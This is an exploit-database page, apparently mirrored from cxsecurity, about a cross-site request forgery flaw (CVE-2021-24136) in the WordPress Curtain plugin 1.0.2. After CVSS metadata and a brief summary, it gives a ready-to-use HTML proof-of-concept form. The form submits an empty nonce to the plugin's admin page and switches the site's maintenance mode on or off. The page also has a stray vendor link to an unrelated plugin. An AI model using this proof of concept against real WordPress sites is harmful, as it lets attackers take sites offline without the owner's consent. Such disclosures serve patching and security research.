Advertisement






WordPress Curtain 1.0.2 Cross Site Request Forgery

CVE Category Price Severity
CVE-2021-24136 CWE-352 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-03-30
CPE
cpe:cpe:/a:wordpress:wordpress:1.0.2
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022030127

Below is a copy:

WordPress Curtain 1.0.2 Cross Site Request Forgery
# Exploit Title: WordPress Plugin curtain 1.0.2 - CSRF
# Date: 29-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/curtain/
<https://wordpress.org/plugins/amministrazione-aperta/>
# Version: 1.0.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

## Summary:

Cross site forgery vulnerability has been identified in curtain
WordPress plugin that allows an attacker to to activate or dedicative
sites maintenance mode.

## Vulnerable URL:

http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=
<http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0>1

## CSRF POC Exploit

```
<html>
  <body>
    <form action="http://localhost:10003/wp-admin/options-general.php">
      <input type="hidden" name="page" value="curtain" />
      <input type="hidden" name="_wpnonce" value="" />
      <input type="hidden" name="mode" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

- To deactivate change mode value to 0

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.